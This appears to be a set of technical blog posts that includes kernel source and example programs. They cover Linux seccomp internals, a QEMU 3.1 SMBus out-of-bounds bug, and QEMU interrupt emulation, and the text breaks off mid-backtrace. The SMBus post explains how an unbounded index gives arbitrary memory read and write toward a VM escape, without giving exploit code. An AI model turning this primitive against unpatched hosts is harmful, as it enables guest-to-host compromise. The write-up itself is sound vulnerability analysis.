    root@ubuntu:~# time ./test1 3

    real	0m0.172s
    user	0m0.080s
    sys	0m0.092s
    root@ubuntu:~# time ./test1 2

    real	0m0.002s
    user	0m0.000s
    sys	0m0.002s

Anatomy of the seccomp

2019-02-04T00:00:00+00:00

Introduction

Linux kernel expose a lot of system calls to the userland process, however not all them will be used in one process. In most of the cases, one process only uses a very limited system calls and leave a lot of the other system calls unused. It is harmful to let one process to call any system calls. For example if one system call(the process don’t use in normal execution) is implemented with a security issue, the process can easily trigger this. Also if one process was compromised, the attacker usually will run a piece of shellcode and this may trigger the system calls that the process will not trigger in normal execution(such as execve). So reduce the system calls that one process can make is useful.

Seccomp filtering is such a mechism to specify a filter for process’s incoming system calls. Seccomp was originated from Secure Computing. At first, there are only a strict seccomp mode. This means once the process is set to the strict mode, it can only call the ‘read’, ‘write’, ‘_exit’ and ‘sigreturn’ system calls. Of course this is not flexible and not very useful. Later the seccomp adds a filter mode. The process can set the seccomp policy to filter mode and add a new filter program to the kernel. This filter program is Berkeley Packet Filter(BPF) program, as with socket filters, except that the data operated on is related to system call being made: system call number and the system call arguments. With BPF program added to the kernel, the process can easily make his policy to filter the system calls, let the kernel reject a system call or send a SIGSYS signal to the process. Note that BFP program can’t deference pointers so the seccomp can just evaluates the system call arguments directly.

Framework

The idea behind seccomp is very simple. Following picture show it. First, the process should set the seccomp policy to strict or filter mode. This will cause the kernel set the seccomp flag in task_struct and if the process sets the filter mode, the kernel will add the program to a seccomp filter list in task_struct. Later for every system call the process made, the kernel will check that based the seccomp filter.

Usage

Following code shows the strict seccomp mode usage. In default, the process doesn’t enable seccomp means it can call any system call. After set it to strict mode, it can only can the four system call so even the prctl itself can’t be called.

    #include <stdio.h>
    #include <sys/prctl.h>
    #include <linux/seccomp.h>
    #include <unistd.h>

    int main() {
        int ret;
        ret = prctl(PR_GET_SECCOMP);
        if (ret == 0) {
            printf("no seccomp enabled!\n");
        }
        else {
            printf("seccomp enabled!\n");
        }
        prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);
        ret = prctl(PR_GET_SECCOMP);
        printf("you should not see me!\n");
    }

Following is the result.

    test@ubuntu:~$ ./prctl 
    no seccomp enabled!
    Killed

Following code shows the filter mode usage. The BPF program instruction spec can be found here。The BPF program here just allow the prctl and write system call. Also note that we need call prctl(PR_SET_NO_NEW_PRIVS) to make sure the current process and its child process can’t be granted new privilegs(for eaxmple, running a setuid binary)。

    #include <stdio.h>
    #include <sys/prctl.h>
    #include <linux/seccomp.h>
    #include <unistd.h>
    #include <linux/filter.h>
    #include <stddef.h>
    #include <sys/syscall.h>

    int main() {
        int ret;
        struct sock_filter filter[] = {
            BPF_STMT(BPF_LD+BPF_W+BPF_ABS, (offsetof(struct seccomp_data, nr))),
            BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_prctl, 0, 1),
        BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW),
        BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_write, 0, 1),
            BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW),
            BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
        };
        
        struct sock_fprog prog = {
            .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
        .filter = filter,
        };
        ret = prctl(PR_GET_SECCOMP);
        if (ret == 0) {
            printf("no seccomp enabled!\n");
        }
        else {
            printf("seccomp enabled!\n");
        }

        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
            perror("prctl(NO_NEW_PRIVS)");
        exit(1);
        }
        if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)) {
            perror("prctl(SECCOMP)");
            exit(1);
        }

        ret = prctl(PR_GET_SECCOMP);
        if (ret == 0) {
            printf("no seccomp enabled!\n");
        }
        else {
            printf("seccomp enabled = %d!\n", ret);
        }
        dup2(1,2);
        printf("you should not see me!\n");
        return 0;
    }

Following is the result.

    test@ubuntu:~$ ./filter 
    no seccomp enabled!
    seccomp enabled = 2!
    Bad system call (core dumped)

Kernel implementation

We can use prctl to get/set seccomp policy. Also the new seccomp system call be used to set seccomp policy. The implementation of prctl system call is in kernel/sys.c file. Function ‘prctl_set_seccomp’ is called when the first argument of prctl is PR_SET_SECCOMP, following shows the code.

    long prctl_set_seccomp(unsigned long seccomp_mode, char __user *filter)
    {
        unsigned int op;
        char __user *uargs;

        switch (seccomp_mode) {
        case SECCOMP_MODE_STRICT:
            op = SECCOMP_SET_MODE_STRICT;
            /*
            * Setting strict mode through prctl always ignored filter,
            * so make sure it is always NULL here to pass the internal
            * check in do_seccomp().
            */
            uargs = NULL;
            break;
        case SECCOMP_MODE_FILTER:
            op = SECCOMP_SET_MODE_FILTER;
            uargs = filter;
            break;
        default:
            return -EINVAL;
        }

        /* prctl interface doesn't have flags, so they are always zero. */
        return do_seccomp(op, 0, uargs);
    }

Set the ‘op’ according the seccomp mode and call do_seccomp.

    static long do_seccomp(unsigned int op, unsigned int flags,
                const char __user *uargs)
    {
        switch (op) {
        case SECCOMP_SET_MODE_STRICT:
            if (flags != 0 || uargs != NULL)
                return -EINVAL;
            return seccomp_set_mode_strict();
        case SECCOMP_SET_MODE_FILTER:
            return seccomp_set_mode_filter(flags, uargs);
        default:
            return -EINVAL;
        }
    }

Call ‘seccomp_set_mode_strict’ directly.

    static long seccomp_set_mode_strict(void)
    {
        const unsigned long seccomp_mode = SECCOMP_MODE_STRICT;
        long ret = -EINVAL;

        spin_lock_irq(&current->sighand->siglock);

        if (!seccomp_may_assign_mode(seccomp_mode))
            goto out;

    #ifdef TIF_NOTSC
        disable_TSC();
    #endif
        seccomp_assign_mode(current, seccomp_mode, 0);
        ret = 0;

    out:
        spin_unlock_irq(&current->sighand->siglock);

        return ret;
    }

“seccomp_may_assign_mode” is used to make sure the seccomp has not been set and if it is set and it’s previous value is not the same as SECCOMP_MODE_STRICT, it return false. So here we can see, once we set the seccomp we can’t change it. The state of a seccomp’ed process is stored in ‘seccomp’ filed in task_struct. The definition of ‘seccomp’ is following:

    struct seccomp {
        int mode;
        struct seccomp_filter *filter;
    };

    struct seccomp_filter {
        atomic_t usage;
        struct seccomp_filter *prev;
        struct bpf_prog *prog;
    };

The ‘mode’ field indicates the seccomp mode and the ‘filter’ is used to link all of the filter in seccomp filter mode. Once the check of ‘seccomp_may_assign_mode’ passed, ‘seccomp_set_mode_strict’ calls ‘seccomp_assign_mode’ to set seccomp mode. It just set ‘task->seccomp.mode’ and set ‘task_struct->thread_info->flags’ with ‘TIF_SECCOMP’. If the ‘op’ of ‘do_seccomp’s argument is ‘SECCOMP_SET_MODE_FILTER’, this means the userland want to set seccomp mode to filter. The ‘do_seccomp’ calls ‘seccomp_set_mode_filter’.

    static long seccomp_set_mode_filter(unsigned int flags,
                        const char __user *filter)
    {
        const unsigned long seccomp_mode = SECCOMP_MODE_FILTER;
        struct seccomp_filter *prepared = NULL;
        long ret = -EINVAL;

        /* Validate flags. */
        if (flags & ~SECCOMP_FILTER_FLAG_MASK)
            return -EINVAL;

        /* Prepare the new filter before holding any locks. */
        prepared = seccomp_prepare_user_filter(filter);
        if (IS_ERR(prepared))
            return PTR_ERR(prepared);

        /*
        * Make sure we cannot change seccomp or nnp state via TSYNC
        * while another thread is in the middle of calling exec.
        */
        if (flags & SECCOMP_FILTER_FLAG_TSYNC &&
            mutex_lock_killable(&current->signal->cred_guard_mutex))
            goto out_free;

        spin_lock_irq(&current->sighand->siglock);

        if (!seccomp_may_assign_mode(seccomp_mode))
            goto out;

        ret = seccomp_attach_filter(flags, prepared);
        if (ret)
            goto out;
        /* Do not free the successfully attached filter. */
        prepared = NULL;

        seccomp_assign_mode(current, seccomp_mode, flags);
    out:
        spin_unlock_irq(&current->sighand->siglock);
        if (flags & SECCOMP_FILTER_FLAG_TSYNC)
            mutex_unlock(&current->signal->cred_guard_mutex);
    out_free:
        seccomp_filter_free(prepared);
        return ret;
    }

‘seccomp_prepare_user_filter’ is used to prepare the new filter. It mainly calls ‘seccomp_prepare_filter’. ‘seccomp_prepare_filter’ check the argument userland provided. Then do a permission check, as the comments says it only allow process ‘CAP_SYS_ADMIN in its namespace or be running with no_new_privs’ to set seccomp to filter mode.

    static struct seccomp_filter *seccomp_prepare_filter(struct sock_fprog *fprog)
    {
        struct seccomp_filter *sfilter;
        int ret;
        const bool save_orig = config_enabled(CONFIG_CHECKPOINT_RESTORE);

        if (fprog->len == 0 || fprog->len > BPF_MAXINSNS)
            return ERR_PTR(-EINVAL);

        BUG_ON(INT_MAX / fprog->len < sizeof(struct sock_filter));

        /*
        * Installing a seccomp filter requires that the task has
        * CAP_SYS_ADMIN in its namespace or be running with no_new_privs.
        * This avoids scenarios where unprivileged tasks can affect the
        * behavior of privileged children.
        */
        if (!task_no_new_privs(current) &&
            security_capable_noaudit(current_cred(), current_user_ns(),
                        CAP_SYS_ADMIN) != 0)
            return ERR_PTR(-EACCES);

        /* Allocate a new seccomp_filter */
        sfilter = kzalloc(sizeof(*sfilter), GFP_KERNEL | __GFP_NOWARN);
        if (!sfilter)
            return ERR_PTR(-ENOMEM);

        ret = bpf_prog_create_from_user(&sfilter->prog, fprog,
                        seccomp_check_filter, save_orig);
        if (ret < 0) {
            kfree(sfilter);
            return ERR_PTR(ret);
        }

        atomic_set(&sfilter->usage, 1);

        return sfilter;
    }

Then ‘seccomp_prepare_filter’ calls ‘bpf_prog_create_from_user’ to copy the filter program from userland to kernel and also make a sanity check. After prepare a filter, the ‘seccomp_set_mode_filter’ calls ‘seccomp_attach_filter’ to attach this filter to process. It is simply link this new filter to ‘task_struct->seccomp.filter’ lists. Finally set the ‘task_struct->seccomp.mode’ to SECCOMP_MODE_FILTER and set ‘task_struct->thread_info->flags’ with ‘TIF_SECCOMP’.

When the process set seccomp mode, what system call it can make is stricted or filtered. In the system call enter, it checks ‘_TIF_WORK_SYSCALL_ENTRY’(arch\x86\entry\entry_64.S) and if it is not 0, it means it should do something before dispatch the system call.

    #define _TIF_WORK_SYSCALL_ENTRY	\
        (_TIF_SYSCALL_TRACE | _TIF_SYSCALL_EMU | _TIF_SYSCALL_AUDIT |	\
        _TIF_SECCOMP | _TIF_SINGLESTEP | _TIF_SYSCALL_TRACEPOINT |	\
        _TIF_NOHZ)

Here we can see ‘_TIF_SECCOMP ‘ if part of ‘_TIF_WORK_SYSCALL_ENTRY’. First it calls ‘syscall_trace_enter_phase1’. In that function it calls ‘seccomp_phase1’.

    u32 seccomp_phase1(struct seccomp_data *sd)
    {
        int mode = current->seccomp.mode;
        int this_syscall = sd ? sd->nr :
            syscall_get_nr(current, task_pt_regs(current));

        if (config_enabled(CONFIG_CHECKPOINT_RESTORE) &&
            unlikely(current->ptrace & PT_SUSPEND_SECCOMP))
            return SECCOMP_PHASE1_OK;

        switch (mode) {
        case SECCOMP_MODE_STRICT:
            __secure_computing_strict(this_syscall);  /* may call do_exit */
            return SECCOMP_PHASE1_OK;
    #ifdef CONFIG_SECCOMP_FILTER
        case SECCOMP_MODE_FILTER:
            return __seccomp_phase1_filter(this_syscall, sd);
    #endif
        default:
            BUG();
        }
    }

For strict mode it calls ‘__secure_computing_strict’. It compare ‘this_syscall’ with the four allowed system call and do_exit with SIGKILL if current syscall is not one of them.

    static void __secure_computing_strict(int this_syscall)
    {
        int *syscall_whitelist = mode1_syscalls;
    #ifdef CONFIG_COMPAT
        if (is_compat_task())
            syscall_whitelist = mode1_syscalls_32;
    #endif
        do {
            if (*syscall_whitelist == this_syscall)
                return;
        } while (*++syscall_whitelist);

    #ifdef SECCOMP_DEBUG
        dump_stack();
    #endif
        audit_seccomp(this_syscall, SIGKILL, SECCOMP_RET_KILL);
        do_exit(SIGKILL);
    }

    static int mode1_syscalls_32[] = {
        __NR_seccomp_read_32, __NR_seccomp_write_32, __NR_seccomp_exit_32, __NR_seccomp_sigreturn_32,
        0, /* null terminated */
    };

For filter mode, it calls ‘__seccomp_phase1_filter’ to run the filter in ‘task_struct->seccomp.filter’.

    static u32 __seccomp_phase1_filter(int this_syscall, struct seccomp_data *sd)
    {
        u32 filter_ret, action;
        int data;

        /*
        * Make sure that any changes to mode from another thread have
        * been seen after TIF_SECCOMP was seen.
        */
        rmb();

        filter_ret = seccomp_run_filters(sd);
        data = filter_ret & SECCOMP_RET_DATA;
        action = filter_ret & SECCOMP_RET_ACTION;

        switch (action) {
        case SECCOMP_RET_ERRNO:
            /* Set low-order bits as an errno, capped at MAX_ERRNO. */
            if (data > MAX_ERRNO)
                data = MAX_ERRNO;
            syscall_set_return_value(current, task_pt_regs(current),
                        -data, 0);
            goto skip;

        case SECCOMP_RET_TRAP:
            /* Show the handler the original registers. */
            syscall_rollback(current, task_pt_regs(current));
            /* Let the filter pass back 16 bits of data. */
            seccomp_send_sigsys(this_syscall, data);
            goto skip;

        case SECCOMP_RET_TRACE:
            return filter_ret;  /* Save the rest for phase 2. */

        case SECCOMP_RET_ALLOW:
            return SECCOMP_PHASE1_OK;

        case SECCOMP_RET_KILL:
        default:
            audit_seccomp(this_syscall, SIGSYS, action);
            do_exit(SIGSYS);
        }

        unreachable();

    skip:
        audit_seccomp(this_syscall, 0, action);
        return SECCOMP_PHASE1_SKIP;
    }

Notice here only ‘SECCOMP_RET_TRACE’ will cause the ‘syscall_trace_enter_phase2’ be called in entry_64.S. If the ‘return’ is ‘SECCOMP_RET_KILL’ it will cause the process exit with SIGSYS signal.

make QEMU VM escape great again

2018-12-06T00:00:00+00:00

The QEMU 3.1 introduced a very serious security issue in SMBus implementation.

The corresponding commit is following:

i2c: pm_smbus: Add block transfer capability

And the fix is in i2c: pm_smbus: check smb_index before block transfer write

The issue is the processing of SMBHSTSTS command in smb_ioport_writeb() function.

Here we see the s->smb_index is increased without bounding check. The read is from ‘s->smb_addr’ and can be controlled by SMBHSTADD command. So it is easy to bypass the if (!read…). As the ‘s->smb_index’ is a ‘uint_32’, this means we can add it to 0xffffffff theoretically. This ‘s->smb_index’ is used to index the memory in ‘s->smb_data’.

case SMBHSTSTS:
    s->smb_stat &= ~(val & ~STS_HOST_BUSY);
    if (!s->op_done && !(s->smb_auxctl & AUX_BLK)) {
        uint8_t read = s->smb_addr & 0x01;

        s->smb_index++;
        if (!read && s->smb_index == s->smb_data0) {
            uint8_t prot = (s->smb_ctl >> 2) & 0x07;
            uint8_t cmd = s->smb_cmd;
            uint8_t addr = s->smb_addr >> 1;
            int ret;

            if (prot == PROT_I2C_BLOCK_READ) {
                s->smb_stat |= STS_DEV_ERR;
                goto out;
            }

            ret = smbus_write_block(s->smbus, addr, cmd, s->smb_data,
                                    s->smb_data0, !s->i2c_enable);
            if (ret < 0) {
                s->smb_stat |= STS_DEV_ERR;
                goto out;
            }
            s->op_done = true;
            s->smb_stat |= STS_INTR;
            s->smb_stat &= ~STS_HOST_BUSY;
        } else if (!read) {
            s->smb_data[s->smb_index] = s->smb_blkdata;
            s->smb_stat |= STS_BYTE_DONE;
        } else if (s->smb_ctl & CTL_LAST_BYTE) {
            s->op_done = true;
            s->smb_blkdata = s->smb_data[s->smb_index];
            s->smb_index = 0;
            s->smb_stat |= STS_INTR;
            s->smb_stat &= ~STS_HOST_BUSY;
        } else {
            s->smb_blkdata = s->smb_data[s->smb_index];
            s->smb_stat |= STS_BYTE_DONE;
        }
    }
    break;

Look at this code snippet more, there are three ‘else’ after the ‘s->smb_index’ increased. The next important data appears ‘s->smb_blkdata’. This data can be assign by write and write using ‘SMBBLKDAT’ command. In the first ‘else’ we can assign ‘s->smb_data[s->smb_index]’ with ‘s->smb_blkdata’, this means we can write arbitrary bytes out of ‘s->smb_data’ array. In the second and last ‘else’, the ‘s->smb_data[s->smb_index]’ is assigned to ‘s->smb_blkdata’, this means we can read bytes out of ‘s->smb_data’ array.

So we can read/write a lot of (4G theoretically) memory after ‘s->smb_data’ array. This gives us a lot of power and room to make exploit.

Following is the demo of VM escape.

QEMU interrupt emulation

2018-09-06T00:00:00+00:00

I have written a blog about kvm interrupt emulation. As we know, the QEMU can emulation the whole system, in this blog, I will disscuss how the QEMU emulate the interrupt chip of a virtual machine. In this blog, we assume that all of the irqchip is emulated in QEMU, set the qemu command line with ‘-machine kernel-irqchip=off’ can achive this.

Interrupt controller initialization

The function ‘pc_init1’ first allocates the ‘pcms->gsi’ to represent the interrupt delivery start point.

pcms->gsi = qemu_allocate_irqs(gsi_handler, gsi_state, GSI_NUM_PINS);

qemu_irq *qemu_allocate_irqs(qemu_irq_handler handler, void *opaque, int n)
{
    return qemu_extend_irqs(NULL, 0, handler, opaque, n);
}

qemu_irq *qemu_extend_irqs(qemu_irq *old, int n_old, qemu_irq_handler handler,
                           void *opaque, int n)
{
    qemu_irq *s;
    int i;

    if (!old) {
        n_old = 0;
    }
    s = old ? g_renew(qemu_irq, old, n + n_old) : g_new(qemu_irq, n);
    for (i = n_old; i < n + n_old; i++) {
        s[i] = qemu_allocate_irq(handler, opaque, i);
    }
    return s;
}

This function allocates 24 ‘qemu_irq’ struct and the handler is set to ‘gsi_handler’. Here ‘gsi’ is the abbreviation of ‘global system interrupts’.

Later, in ‘i440fx_init’, this ‘gsi’ is assigned to ‘piix3->pic’, it also calls ‘pci_bus_irqs’ to set the pci bus’s ‘set_irq’ and ‘get_irq’ function.

    pci_bus_irqs(b, piix3_set_irq, pci_slot_get_pirq, piix3,
            PIIX_NUM_PIRQS);

‘piix3_set_irq’ function finally calls ‘piix3_\set_irq_pic’, which we can see calls the ‘piix3->pic’ which is the ‘gsi’.

static void piix3_set_irq_pic(PIIX3State *piix3, int pic_irq)
{
    qemu_set_irq(piix3->pic[pic_irq],
                 !!(piix3->pic_levels &
                    (((1ULL << PIIX_NUM_PIRQS) - 1) <<
                     (pic_irq * PIIX_NUM_PIRQS))));
}

Return to ‘pc_init1’, it calls ‘isa_bus_irqs’, this function set the ISA bus’s irqs to ‘gsi’.

    isa_bus_irqs(isa_bus, pcms->gsi);

As we emulate irqchip in QEMU, it calls ‘i8259_init’, it first calls ‘pc_allocate_cpu_irq’ to allocate a parent_irq. ‘pic_irq_request’ is used as this irq’s handler.

    if (kvm_pic_in_kernel()) {
        i8259 = kvm_i8259_init(isa_bus);
    } else if (xen_enabled()) {
        i8259 = xen_interrupt_controller_init();
    } else {
        i8259 = i8259_init(isa_bus, pc_allocate_cpu_irq());
    }
    
qemu_irq pc_allocate_cpu_irq(void)
{
    return qemu_allocate_irq(pic_irq_request, NULL, 0);
}

In order to understand function ‘i8259_init’, we need first to look at the i8259 realize function.

static void pic_realize(DeviceState *dev, Error **errp)
{
    PICCommonState *s = PIC_COMMON(dev);
    PICClass *pc = PIC_GET_CLASS(dev);

    memory_region_init_io(&s->base_io, OBJECT(s), &pic_base_ioport_ops, s,
                          "pic", 2);
    memory_region_init_io(&s->elcr_io, OBJECT(s), &pic_elcr_ioport_ops, s,
                          "elcr", 1);

    qdev_init_gpio_out(dev, s->int_out, ARRAY_SIZE(s->int_out));
    qdev_init_gpio_in(dev, pic_set_irq, 8);

    pc->parent_realize(dev, errp);
}

In ‘pic_realize’ function, the most import function is ‘qdev_init_gpio_out’ and ‘qdev_init_gpio_in’.

    void qdev_init_gpio_out(DeviceState *dev, qemu_irq *pins, int n)
    {
        qdev_init_gpio_out_named(dev, pins, NULL, n);
    }
    
    void qdev_init_gpio_out_named(DeviceState *dev, qemu_irq *pins,
                                const char *name, int n)
    {
        int i;
        NamedGPIOList *gpio_list = qdev_get_named_gpio_list(dev, name);
    
        assert(gpio_list->num_in == 0 || !name);
    
        if (!name) {
            name = "unnamed-gpio-out";
        }
        memset(pins, 0, sizeof(*pins) * n);
        for (i = 0; i < n; ++i) {
            gchar *propname = g_strdup_printf("%s[%u]", name,
                                            gpio_list->num_out + i);
    
            object_property_add_link(OBJECT(dev), propname, TYPE_IRQ,
                                    (Object **)&pins[i],
                                    object_property_allow_set_link,
                                    OBJ_PROP_LINK_UNREF_ON_RELEASE,
                                    &error_abort);
            g_free(propname);
        }
        gpio_list->num_out += n;
    }

‘qdev_init_gpio_out’ function add a link property named ‘unamed-gpio-out[0]’ and set the link *child to ‘address of ‘s->int_out’. Likely , ‘qdev_init_gpio_in’ adds 8 ‘unamed-gpio-in[0]’ link property.

Return back function ‘i8259_init’.

    qemu_irq *i8259_init(ISABus *bus, qemu_irq parent_irq)
    {
        qemu_irq *irq_set;
        DeviceState *dev;
        ISADevice *isadev;
        int i;
    
        irq_set = g_new0(qemu_irq, ISA_NUM_IRQS);
    
        isadev = i8259_init_chip(TYPE_I8259, bus, true);
        dev = DEVICE(isadev);
    
        qdev_connect_gpio_out(dev, 0, parent_irq);
        for (i = 0 ; i < 8; i++) {
            irq_set[i] = qdev_get_gpio_in(dev, i);
        }
    
        isa_pic = dev;
    
        isadev = i8259_init_chip(TYPE_I8259, bus, false);
        dev = DEVICE(isadev);
    
        qdev_connect_gpio_out(dev, 0, irq_set[2]);
        for (i = 0 ; i < 8; i++) {
            irq_set[i + 8] = qdev_get_gpio_in(dev, i);
        }
    
        slave_pic = PIC_COMMON(dev);
    
        return irq_set;
    }

First create the master pic and set the output pin (‘s->int_out’) to the ‘parent_irq’, this is done through function ‘qdev_connect_gpio_out_named’ which set the ‘unamed-gpio-out[0]’ link property. Then create the slave pic and set its out pin to the master’s second in pin. Finally return the ‘irq_set’, this is all of the pic’s ‘qemu_irq’.

Then these ‘qemu_irq’ is assigned to ‘gsi_state’ and calls ‘ioapic_init_gsi’ to initialize the IOAPIC.

void ioapic_init_gsi(GSIState *gsi_state, const char *parent_name)
{
    DeviceState *dev;
    SysBusDevice *d;
    unsigned int i;

    if (kvm_ioapic_in_kernel()) {
        dev = qdev_create(NULL, "kvm-ioapic");
    } else {
        dev = qdev_create(NULL, "ioapic");
    }
    if (parent_name) {
        object_property_add_child(object_resolve_path(parent_name, NULL),
                                  "ioapic", OBJECT(dev), NULL);
    }
    qdev_init_nofail(dev);
    d = SYS_BUS_DEVICE(dev);
    sysbus_mmio_map(d, 0, IO_APIC_DEFAULT_ADDRESS);

    for (i = 0; i < IOAPIC_NUM_PINS; i++) {
        gsi_state->ioapic_irq[i] = qdev_get_gpio_in(dev, i);
    }
}

Here create the ioapic device and set the ‘gsi_state->ioapic_irq’ with the ioapic’s ‘qemu_irq’. The later is created in the realize of ioapic device. The handler is ‘ioapic_set_irq’.

Interrupt delivery

Let’s take a PCI device’s interrupt delivery as an example. The PCI device can call ‘pci_set_irq’ to issue an interrupt to the kernel.

void pci_set_irq(PCIDevice *pci_dev, int level)
{
    int intx = pci_intx(pci_dev);
    pci_irq_handler(pci_dev, intx, level);
}
static inline int pci_intx(PCIDevice *pci_dev)
{
    return pci_get_byte(pci_dev->config + PCI_INTERRUPT_PIN) - 1;
}

static void pci_irq_handler(void *opaque, int irq_num, int level)
{
    PCIDevice *pci_dev = opaque;
    int change;

    change = level - pci_irq_state(pci_dev, irq_num);
    if (!change)
        return;

    pci_set_irq_state(pci_dev, irq_num, level);
    pci_update_irq_status(pci_dev);
    if (pci_irq_disabled(pci_dev))
        return;
    pci_change_irq_level(pci_dev, irq_num, change);
}

static void pci_change_irq_level(PCIDevice *pci_dev, int irq_num, int change)
{
    PCIBus *bus;
    for (;;) {
        bus = pci_get_bus(pci_dev);
        irq_num = bus->map_irq(pci_dev, irq_num);
        if (bus->set_irq)
            break;
        pci_dev = bus->parent_dev;
    }
    bus->irq_count[irq_num] += change;
    bus->set_irq(bus->irq_opaque, irq_num, bus->irq_count[irq_num] != 0);
}

There are a little PCI-specific knowledge I will not discuss just focus the interrupt instead. In the last function ‘pci_change_irq_level’, it calls the PCI bus’ ‘map_irq’ to get the irq number and then call ‘set_irq’ which as we know is ‘piix3_set_irq’. This function calls ‘piix3_set_irq_pic’.

static void piix3_set_irq_pic(PIIX3State *piix3, int pic_irq)
{
    qemu_set_irq(piix3->pic[pic_irq],
                 !!(piix3->pic_levels &
                    (((1ULL << PIIX_NUM_PIRQS) - 1) <<
                     (pic_irq * PIIX_NUM_PIRQS))));
}

The piix3->pic is the gsi and the handler is ‘gsi_handler’.

void gsi_handler(void *opaque, int n, int level)
{
    GSIState *s = opaque;

    DPRINTF("pc: %s GSI %d\n", level ? "raising" : "lowering", n);
    if (n < ISA_NUM_IRQS) {
        qemu_set_irq(s->i8259_irq[n], level);
    }
    qemu_set_irq(s->ioapic_irq[n], level);
}

Choose the interrupt controller according the irq number and aclls the corresponding handler. Take ioapic_irq as for example, the handler is ‘ioapic_set_irq’. In this function it calls ‘ioapic_service’ to delivery interrupt to the LAPIC. This is through ‘stl_le_phys’, this will cause the apic’s MMIO write function being called, which is ‘apic_mem_writel’. APIC can call ‘apic_update_irq’ to process interrupt. THen ‘cpu_interrupt’ and finally ‘kvm_handle_interrupt’ is called.

static void kvm_handle_interrupt(CPUState *cpu, int mask)
{
    cpu->interrupt_request |= mask;

    if (!qemu_cpu_is_self(cpu)) {
        qemu_cpu_kick(cpu);
    }
}

Here set the ‘cpu->interrupt_request’ then in the next enter the guest, the QEMU will call ioctl with ‘KVM_INTERRUPT’ ioctl to inject the interrupt to the guest.

Let’s see a backtrack of interrupt delivery to make a more deep impression.

(gdb) bt
#0  apic_mem_write (opaque=0x61600000a280, addr=16388, val=33, size=4)
    at /home/test/qemu/hw/intc/apic.c:756
#1  0x000055ce1f7241fd in memory_region_write_accessor (mr=0x61600000a300, 
    addr=16388, value=0x7f329b8f8188, size=4, shift=0, mask=4294967295, 
    attrs=...) at /home/test/qemu/memory.c:526
#2  0x000055ce1f7244d6 in access_with_adjusted_size (addr=16388, 
    value=0x7f329b8f8188, size=4, access_size_min=1, access_size_max=4, 
    access_fn=0x55ce1f72404f <memory_region_write_accessor>, 
    mr=0x61600000a300, attrs=...) at /home/test/qemu/memory.c:593
#3  0x000055ce1f72b2cc in memory_region_dispatch_write (mr=0x61600000a300, 
    addr=16388, data=33, size=4, attrs=...) at /home/test/qemu/memory.c:1473
#4  0x000055ce1f65021b in address_space_stl_internal (
    as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33, 
    attrs=..., result=0x0, endian=DEVICE_LITTLE_ENDIAN)
    at /home/test/qemu/memory_ldst.inc.c:349
#5  0x000055ce1f65047f in address_space_stl_le (
    as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33, 
    attrs=..., result=0x0) at /home/test/qemu/memory_ldst.inc.c:386
#6  0x000055ce1f80aff5 in stl_le_phys (
    as=0x55ce2142c940 <address_space_memory>, addr=4276109316, val=33)
    at /home/test/qemu/include/exec/memory_ldst_phys.inc.h:103
#7  0x000055ce1f80c8af in ioapic_service (s=0x61b000002a80)
    at /home/test/qemu/hw/intc/ioapic.c:136
---Type <return> to continue, or q <return> to quit---
#8  0x000055ce1f80cb35 in ioapic_set_irq (opaque=0x61b000002a80, vector=15, 
    level=1) at /home/test/qemu/hw/intc/ioapic.c:175
#9  0x000055ce1fbe79a0 in qemu_set_irq (irq=0x60600006a880, level=1)
    at hw/core/irq.c:45
#10 0x000055ce1f8bfb1c in gsi_handler (opaque=0x612000007540, n=15, level=1)
    at /home/test/qemu/hw/i386/pc.c:120
#11 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x6060000414e0, level=1)
    at hw/core/irq.c:45
#12 0x000055ce1fc8a0f3 in bmdma_irq (opaque=0x6250001c3e10, n=0, level=1)
    at hw/ide/pci.c:222
#13 0x000055ce1fbe79a0 in qemu_set_irq (irq=0x606000091280, level=1)
    at hw/core/irq.c:45
#14 0x000055ce1fc7ba3c in qemu_irq_raise (irq=0x606000091280)
    at /home/test/qemu/include/hw/irq.h:16
#15 0x000055ce1fc7bb20 in ide_set_irq (bus=0x6250001c32c0)
    at /home/test/qemu/include/hw/ide/internal.h:568
#16 0x000055ce1fc7fa75 in ide_atapi_cmd_reply_end (s=0x6250001c3338)
    at hw/ide/atapi.c:319
#17 0x000055ce1fc7902c in ide_data_readl (opaque=0x6250001c32c0, addr=368)
    at hw/ide/core.c:2389
#18 0x000055ce1f713e32 in portio_read (opaque=0x614000002040, addr=0, size=4)
    at /home/test/qemu/ioport.c:180
#19 0x000055ce1f7239bb in memory_region_read_accessor (mr=0x614000002040, 
---Type <return> to continue, or q <return> to quit---
    addr=0, value=0x7f329b8f8790, size=4, shift=0, mask=4294967295, attrs=...)
    at /home/test/qemu/memory.c:435
#20 0x000055ce1f7244d6 in access_with_adjusted_size (addr=0, 
    value=0x7f329b8f8790, size=4, access_size_min=1, access_size_max=4, 
    access_fn=0x55ce1f723913 <memory_region_read_accessor>, mr=0x614000002040, 
    attrs=...) at /home/test/qemu/memory.c:593
#21 0x000055ce1f72aa42 in memory_region_dispatch_read1 (mr=0x614000002040, 
    addr=0, pval=0x7f329b8f8790, size=4, attrs=...)
    at /home/test/qemu/memory.c:1392
#22 0x000055ce1f72ac25 in memory_region_dispatch_read (mr=0x614000002040, 
    addr=0, pval=0x7f329b8f8790, size=4, attrs=...)
    at /home/test/qemu/memory.c:1423
#23 0x000055ce1f64cd0c in flatview_read_continue (fv=0x60600017f120, addr=368, 
    attrs=..., buf=0x7f329e50c004 "", len=4, addr1=0, l=4, mr=0x614000002040)
    at /home/test/qemu/exec.c:3293
#24 0x000055ce1f64d028 in flatview_read (fv=0x60600017f120, addr=368, 
    attrs=..., buf=0x7f329e50c004 "", len=4) at /home/test/qemu/exec.c:3331
#25 0x000055ce1f64d0ed in address_space_read_full (
    as=0x55ce2142c8c0 <address_space_io>, addr=368, attrs=..., 
    buf=0x7f329e50c004 "", len=4) at /home/test/qemu/exec.c:3344
#26 0x000055ce1f64d1c4 in address_space_rw (
    as=0x55ce2142c8c0 <address_space_io>, addr=368, attrs=..., 
